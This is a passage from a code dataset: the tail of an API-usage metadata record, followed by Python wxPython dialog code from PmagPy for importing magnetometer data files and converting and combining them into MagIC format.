"usage_type": "name"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 120, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 197, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 198, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 524, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 535, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 536, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 665, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 701, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 711, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 712, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 881, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 907, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 917, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 918, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1100, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1127, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1137, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1138, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1431, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1462, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1472, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1473, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1521, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1544, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1554, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1555, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1662, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1687, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1697, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1698, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1781, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1807, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1818, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1819, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1949, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1983, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1993, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1994, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2436, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 2500, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 2510, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2832, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 2888, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 2898, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2993, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3021, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3031, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3105, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3135, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3145, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3213, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3240, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3250, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 3287, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 3296, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3310, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3386, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 3396, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 3399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3399, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 3403, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3403, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 3405, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 3409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3409, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 3410, "usage_type": "call"}, {"api_name": "openpyxl.Workbook", "line_number": 3420, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 3442, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3442, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3536, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3536, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3542, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3542, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3549, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3549, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 3554, "usage_type": "call"}]} +{"seq_id": "373122207", "text": "#!/usr/bin/env pythonw\n\n#--------------------------------------------------------------\n# converting magnetometer files to MagIC format\n#--------------------------------------------------------------\nimport wx\nimport wx.grid\nimport os\nimport subprocess\nimport sys\nfrom pmagpy import pmag\nfrom pmagpy import ipmag\nfrom pmagpy import convert_2_magic as convert\nfrom dialogs import pmag_widgets as pw\nfrom dialogs import drop_down_menus3\nfrom dialogs import magic_grid2 as magic_grid\n#sys.path.append(\"../programs\") #later fix imports further down in code to \"from programs import ....\" also imports should be moved to top of file unless import is so large it slows down the program\nfrom pmagpy import convert_2_magic as convert\nfrom programs.conversion_scripts import tdt_magic\nfrom programs.conversion_scripts import jr6_txt_magic\nfrom programs.conversion_scripts import jr6_jr6_magic\nfrom programs.conversion_scripts import iodp_jr6_magic\nfrom pmagpy.mapping import map_magic\n\n\nclass import_magnetometer_data(wx.Dialog):\n def __init__(self, parent, id, title, WD):\n wx.Dialog.__init__(self, parent, id, title, name='import_magnetometer_data')\n self.parent = parent\n self.WD = WD\n self.InitUI()\n self.SetTitle(title)\n\n\n def InitUI(self):\n self.panel = wx.Panel(self)\n vbox = wx.BoxSizer(wx.VERTICAL)\n\n formats = ['generic format','SIO format','CIT format','2g-binary format','2g-ascii format',\n 'HUJI format','LDEO format','IODP format','PMD (ascii) format',\n 'TDT format', 'JR6 format', 'Utrecht format', 'BGC format']\n sbs = wx.StaticBoxSizer(wx.StaticBox(self.panel, wx.ID_ANY, 'step 1: choose file format'), wx.VERTICAL)\n sbs.AddSpacer(5)\n\n radio_buttons = []\n for fmt in formats:\n radio_button = wx.RadioButton(self.panel, -1, label=fmt, name=fmt)\n radio_buttons.append(radio_button)\n sbs.Add(radio_button, flag=wx.BOTTOM, border=5)\n if len(radio_buttons) == 1:\n sbs.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n #sbs.AddSpacer(5)\n self.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButtonSelect, radio_button)\n\n radio_buttons[0].SetValue(True)\n self.checked_rb = radio_buttons[0]\n\n #---------------------\n # OK/Cancel buttons\n #---------------------\n\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(self.panel, id=-1, label='Import file')\n self.okButton.SetDefault()\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n self.nextButton = wx.Button(self.panel, id=-1, label='Go to next step')\n self.Bind(wx.EVT_BUTTON, self.on_nextButton, self.nextButton)\n hboxok.Add(self.okButton)\n hboxok.AddSpacer(20)\n hboxok.Add(self.cancelButton )\n hboxok.AddSpacer(20)\n hboxok.Add(self.nextButton )\n\n #-----------------------\n # design the frame\n #-----------------------\n vbox.AddSpacer(10)\n vbox.Add(sbs)\n vbox.AddSpacer(10)\n vbox.Add(hboxok)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n self.panel.SetSizer(hbox1)\n hbox1.Fit(self)\n\n #-----------------------\n # button methods\n #-----------------------\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n file_type = self.checked_rb.Label.split()[0] # extracts name of the checked radio button\n if file_type == 'generic':\n dia = convert_generic_files_to_MagIC(self, self.WD, \"PmagPy generic file conversion\")\n elif file_type == 'SIO':\n dia = convert_SIO_files_to_MagIC(self, self.WD, \"PmagPy SIO file conversion\")\n elif file_type == 'CIT':\n dia = convert_CIT_files_to_MagIC(self, self.WD, \"PmagPy CIT file conversion\")\n elif file_type == '2g-binary':\n dia = convert_2g_binary_files_to_MagIC(self, self.WD, \"PmagPy 2g-binary file conversion\")\n elif file_type == '2g-ascii':\n dia = convert_2g_ascii_files_to_MagIC(self, self.WD, \"PmagPy 2g-ascii file conversion\")\n elif file_type == 'HUJI':\n dia = convert_HUJI_files_to_MagIC(self, self.WD, \"PmagPy HUJI file conversion\")\n elif file_type == 'LDEO':\n dia = convert_LDEO_files_to_MagIC(self, self.WD, \"PmagPy LDEO file conversion\")\n elif file_type == 'IODP':\n dia = convert_IODP_files_to_MagIC(self, self.WD, \"PmagPy IODP csv conversion\")\n elif file_type == 'PMD':\n dia = convert_PMD_files_to_MagIC(self, self.WD, \"PmagPy PMD conversion\")\n elif file_type == 'BGC':\n dia = convert_BGC_files_to_magic(self, self.WD, \"PmagPy BGC conversion\")\n elif file_type == 'TDT':\n tdt_magic.convert(False, self.WD)\n return True\n elif file_type == 'JR6':\n dia = convert_JR6_files_to_MagIC(self, self.WD)\n elif file_type == 'Utrecht':\n dia = convert_Utrecht_files_to_MagIC(self, self.WD, \"PmagPy Utrecht conversion\")\n dia.Center()\n dia.Show()\n\n\n def OnRadioButtonSelect(self, event):\n self.checked_rb = event.GetEventObject()\n\n def on_nextButton(self,event):\n self.Destroy()\n combine_dia = combine_magic_dialog(self.WD, self.parent)\n combine_dia.Show()\n combine_dia.Center()\n\n#--------------------------------------------------------------\n# dialog for combine_magic.py\n#--------------------------------------------------------------\n\n\nclass combine_magic_dialog(wx.Frame):\n \"\"\"\"\"\"\n title = \"Combine magic files\"\n\n def __init__(self, WD, parent):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self) #wx.Panel(self)\n self.parent = parent\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.WD=WD\n self.InitUI()\n\n def InitUI(self):\n pnl = self.panel\n\n #---sizer information ----\n\n TEXT=\"Step 2: \\nCombine different MagIC formatted files to one file named 'measurements.txt'\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n\n #---sizer 0 ----\n self.bSizer0 = pw.combine_files(self, \".magic\", DM=3)\n #------------------\n\n self.okButton = wx.Button(self.panel, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n\n self.nextButton = wx.Button(self.panel, id=-1, label='Go to last step')\n self.Bind(wx.EVT_BUTTON, self.on_nextButton, self.nextButton)\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n #\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n hboxok.Add(self.okButton)\n hboxok.Add(self.cancelButton, flag=wx.LEFT, border=5)\n hboxok.Add(self.nextButton, flag=wx.LEFT, border=5)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_cancelButton(self,event):\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n def on_nextButton(self, event):\n combine_dia = combine_everything_dialog(self.WD, self.Parent)\n combine_dia.Show()\n combine_dia.Center()\n self.Destroy()\n\n def on_okButton(self,event):\n os.chdir(self.WD) # make sure OS is working in self.WD (Windows issue)\n files_text=self.bSizer0.file_paths.GetValue()\n files=files_text.strip('\\n').replace(\" \",\"\")\n if files:\n files = files.split('\\n')\n files = [os.path.join(self.WD, f) for f in files]\n COMMAND=\"combine_magic.py -F measurements.txt -f %s\"%(\" \".join(files) )\n\n if ipmag.combine_magic(files, 'measurements.txt', data_model=3.0):\n MSG=\"%i file are merged to one MagIC format file:\\n measurements.txt.\\n\\nSee Terminal/message window for errors\"%(len(files))\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n else:\n pw.simple_warning()\n return\n\n self.on_nextButton(event)\n self.Destroy()\n\n\nclass combine_everything_dialog(wx.Frame):\n \"\"\"\"\"\"\n title = \"Combine MagIC files\"\n\n def __init__(self, WD, parent):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self) #wx.Panel(self)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.parent = parent\n self.WD=WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n\n #---sizer information ----\n\n TEXT=\"Step 3: \\nCombine different MagIC formatted files to one file name (if necessary). All files should be from the working directory.\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n possible_file_dias = ['specimens.txt', 'samples.txt', 'sites.txt', 'locations.txt']\n self.file_dias = []\n all_files = os.listdir(self.WD)\n for dia in possible_file_dias:\n for f in all_files:\n if dia in f:\n bSizer = pw.combine_files(self, dia, DM=3)\n self.file_dias.append(bSizer)\n break\n if not self.file_dias:\n file_string = ', '.join(possible_file_dias)\n MSG = \"You have no more files that can be combined.\\nFile types that can be combined are:\\n{}\\nNote that your file name must end with the file type, i.e.:\\nsomething_something_specimens.txt\".format(file_string)\n dlg = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg.ShowModal()\n dlg.Destroy()\n\n #------------------\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n self.okButton = wx.Button(self.panel, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n hboxok.Add(self.okButton)\n hboxok.Add(self.cancelButton, flag=wx.LEFT, border=5 )\n\n #file_dias = [self.bSizer0, self.bSizer1, self.bSizer2]\n if len(self.file_dias) == 4:\n num_cols, num_rows = 2, 2\n else:\n num_cols = min(len(self.file_dias), 3)\n num_rows = 2 if len(self.file_dias) > 3 else 1\n hboxfiles = wx.GridSizer(num_rows, num_cols, 1, 1)\n hboxfiles.AddMany(self.file_dias)\n\n #hboxfiles = wx.BoxSizer(wx.HORIZONTAL)\n #hboxfiles.AddMany([self.bSizer0, self.bSizer1, self.bSizer2])\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.BOTTOM, border=5)\n vbox.AddSpacer(10)\n vbox.Add(hboxfiles, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_cancelButton(self,event):\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n success = True\n new_files = []\n # go through each pw.combine_files sizer, extract the files, try to combine them into one:\n for bSizer in self.file_dias:\n full_list = bSizer.file_paths.GetValue()\n file_name = bSizer.text\n files = full_list.strip('\\n').replace(\" \", \"\")\n if files:\n files = files.split('\\n')\n else:\n print('No files of {} type found, skipping'.format(file_name))\n continue\n res = ipmag.combine_magic(files, file_name, data_model=3.0)\n if res:\n new_files.append(file_name) # add to the list of successfully combined files\n else:\n success = False\n if success:\n new = '\\n' + '\\n'.join(new_files)\n MSG = \"Created new file(s): {} \\nSee Terminal/message window for details and errors\".format(new)\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n else:\n pw.simple_warning()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n\n#--------------------------------------------------------------\n# MagIC generic files conversion\n#--------------------------------------------------------------\n\n\nclass convert_files_to_MagIC(wx.Frame):\n \"\"\"\n Abstract class for file conversion frames\n \"\"\"\n\n def __init__(self, parent, WD, title):\n self.parent = parent\n self.WD = WD\n self.title = title\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.InitUI()\n\n def InitUI(self):\n pass\n\n def on_cancelButton(self, event):\n self.Destroy()\n self.parent.Show()\n self.parent.Raise()\n\n def on_add_file_button(self, event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_add_dir_button(self, event):\n text = \"choose directory of files to convert to MagIC\"\n pw.on_add_dir_button(self.bSizer0, text)\n\n\nclass convert_generic_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\"\"\"\n title = \"PmagPy generic file conversion\"\n\n def InitUI(self):\n\n pnl = self.panel\n\n #---sizer infor ----\n\n TEXT = \"convert generic file to MagIC format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl)\n\n #---sizer 2 ----\n # unique because only accepts 1 experiment type\n TEXT=\"Experiment:\"\n self.bSizer2 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL)\n self.gridBSizer = wx.GridBagSizer(5, 10)\n self.label1 = wx.StaticText(pnl, label=TEXT)\n self.experiments_names=['Demag (AF and/or Thermal)','Paleointensity-IZZI/ZI/ZI','ATRM 6 positions','AARM 6 positions','cooling rate','TRM']\n self.protocol_info = wx.ComboBox(self.panel, -1, self.experiments_names[0], size=(300,25),choices=self.experiments_names, style=wx.CB_READONLY)\n self.gridBSizer.Add(self.label1, (0, 0))\n self.gridBSizer.Add(self.protocol_info, (1, 0))\n self.bSizer2.Add(self.gridBSizer, wx.ALIGN_LEFT)\n #\n self.Bind(wx.EVT_COMBOBOX, self.on_select_protocol, self.protocol_info)\n self.bSizer2a = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.HORIZONTAL )\n text = 'Cooling Rate, format is xxx,yyy,zzz with no spaces '\n self.cooling_rate = wx.TextCtrl(pnl)\n self.bSizer2a.AddMany([wx.StaticText(pnl, label=text), self.cooling_rate])\n\n #---sizer 3 ----\n self.bSizer3 = pw.lab_field(pnl)\n\n #---sizer 4 ----\n # unique because only allows 4 choices (most others have ncn choices)\n self.bSizer4 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.VERTICAL )\n self.sample_naming_conventions=['sample=specimen','no. of initial characters','no. of terminal characters','character delimited']\n self.sample_naming_convention = wx.ComboBox(self.panel, -1, self.sample_naming_conventions[0], size=(250,25), choices=self.sample_naming_conventions, style=wx.CB_READONLY)\n self.sample_naming_convention_char = wx.TextCtrl(self.panel, id=-1, size=(40,25))\n gridbSizer4 = wx.GridSizer(2, 2, 0, 10)\n gridbSizer4.AddMany( [(wx.StaticText(self.panel,label=\"specimen-sample naming convention\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (wx.StaticText(self.panel,label=\"delimiter/number (if necessary)\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (self.sample_naming_convention,wx.ALIGN_LEFT),\n (self.sample_naming_convention_char,wx.ALIGN_LEFT)])\n #bSizer4.Add(self.sample_specimen_text,wx.ALIGN_LEFT)\n self.bSizer4.AddSpacer(10)\n self.bSizer4.Add(gridbSizer4,wx.ALIGN_LEFT)\n\n #---sizer 5 ----\n self.bSizer5 = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, \"\" ), wx.VERTICAL )\n self.site_naming_conventions=['site=sample','no. of initial characters','no. of terminal characters','character delimited']\n self.site_naming_convention_char = wx.TextCtrl(self.panel, id=-1, size=(40,25))\n self.site_naming_convention = wx.ComboBox(self.panel, -1, self.site_naming_conventions[0], size=(250,25), choices=self.site_naming_conventions, style=wx.CB_READONLY)\n gridbSizer5 = wx.GridSizer(2, 2, 0, 10)\n gridbSizer5.AddMany( [(wx.StaticText(self.panel,label=\"site-sample naming convention\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (wx.StaticText(self.panel,label=\"delimiter/number (if necessary)\",style=wx.TE_CENTER),wx.ALIGN_LEFT),\n (self.site_naming_convention,wx.ALIGN_LEFT),\n (self.site_naming_convention_char,wx.ALIGN_LEFT)])\n self.bSizer5.AddSpacer(10)\n self.bSizer5.Add(gridbSizer5,wx.ALIGN_LEFT)\n\n #---sizer 6 ----\n TEXT=\"Location name:\"\n self.bSizer6 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 7 ----\n #self.bSizer7 = pw.site_lat_lon(pnl)\n\n #---sizer 8 ----\n self.bSizer8 = pw.replicate_measurements(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer2a, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=5)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border=5)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n\n self.hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.bSizer2a.ShowItems(False)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_select_protocol(self, event):\n if self.protocol_info.GetValue() == \"cooling rate\":\n self.bSizer2a.ShowItems(True)\n else:\n self.bSizer2a.ShowItems(False)\n self.hbox_all.Fit(self)\n\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n # generic_magic.py -WD WD - f FILE -fsa er_samples.txt -F OUTFILE.magic -exp [Demag/PI/ATRM 6/AARM 6/CR -samp X Y -site X Y -loc LOCNAME -dc B PHI THETA [-A] -WD path\n options = {}\n\n ErrorMessage = \"\"\n #-----------\n if not self.bSizer0.file_path.GetValue():\n pw.simple_warning('You must provide a generic format file')\n return False\n FILE = str(self.bSizer0.file_path.GetValue())\n options['magfile'] = FILE\n\n #-----------\n # WD=\"/\".join(FILE.split(\"/\")[:-1])\n WD=self.WD\n options['dir_path'] = WD\n input_dir = os.path.split(FILE)[0]\n magicoutfile=os.path.split(FILE)[1]+\".magic\"\n options['meas_file'] = magicoutfile\n print(\"magicoutfile\", magicoutfile)\n OUTFILE=os.path.join(self.WD,magicoutfile)\n #-----------\n #OUTFILE=self.WD+\"/\"+FILE.split('/')[-1]+\".magic\"\n #-----------\n EXP = \"\"\n exp = str(self.protocol_info.GetValue())\n if exp == 'Demag (AF and/or Thermal)':\n EXP = 'Demag'\n elif exp == 'Paleointensity-IZZI/ZI/ZI':\n EXP = 'PI'\n elif exp == 'ATRM 6 positions':\n EXP ='ATRM 6'\n elif exp == 'AARM 6 positions':\n EXP = 'AARM 6'\n elif exp == 'cooling rate':\n cooling = self.cooling_rate.GetValue()\n if not cooling:\n text = \"You must provide cooling rate for this experiment type!\\nThe format is: xxx, yyy,zzz...\\nThis should be cooling rates in [K/minutes], seperated by comma, ordered at the same order as XXX.10,XXX.20 ...XX.70\"\n pw.simple_warning(text)\n return False\n EXP = 'CR {}'.format(cooling)\n if 'CR' in EXP:\n options['experiment'], options['cooling_times_list'] = EXP.split()\n elif 'AARM' in EXP:\n options['experiment'] = EXP\n #options['experiment'], options['aarm_n_pos'] = EXP.split()\n elif 'ATRM' in EXP:\n options['experiment'] = EXP\n #options['experiment'], options['atrm_n_pos'] = EXP.split()\n else:\n options['experiment'] = EXP\n #-----------\n SAMP=\"1 0\" #default\n\n samp_naming_convention = str(self.sample_naming_convention.GetValue())\n try:\n samp_naming_convention_char=int(self.sample_naming_convention_char.GetValue())\n except:\n samp_naming_convention_char = \"0\"\n\n if samp_naming_convention == 'sample=specimen':\n SAMP = \"1 0\"\n elif samp_naming_convention == 'no. of initial characters':\n SAMP = \"0 %i\" % int(samp_naming_convention_char)\n elif samp_naming_convention == 'no. of terminal characters':\n SAMP = \"1 %s\" % samp_naming_convention_char\n elif samp_naming_convention == 'character delimited':\n SAMP = \"2 %s\" % samp_naming_convention_char\n\n options['sample_nc'] = SAMP.split()\n #-----------\n\n SITE = \"1 0\" #default\n\n site_naming_convention = str(self.site_naming_convention.GetValue())\n try:\n site_naming_convention_char = int(self.site_naming_convention_char.GetValue())\n except:\n site_naming_convention_char = \"0\"\n\n if site_naming_convention == 'sample=specimen':\n SITE = \"1 0\"\n elif site_naming_convention == 'no. of initial characters':\n SITE = \"0 %i\" % int(site_naming_convention_char)\n elif site_naming_convention == 'no. of terminal characters':\n SITE = \"1 %s\" % site_naming_convention_char\n elif site_naming_convention == 'character delimited':\n SITE = \"2 %s\" % site_naming_convention_char\n\n options['site_nc'] = SITE.split()\n\n #-----------\n\n LOC = str(self.bSizer6.return_value())\n if LOC!=\"\": options['location'] = LOC\n\n if str(self.bSizer6.return_value()) != \"\":\n LOC=\"-loc \\\"%s\\\"\"%LOC\n else:\n 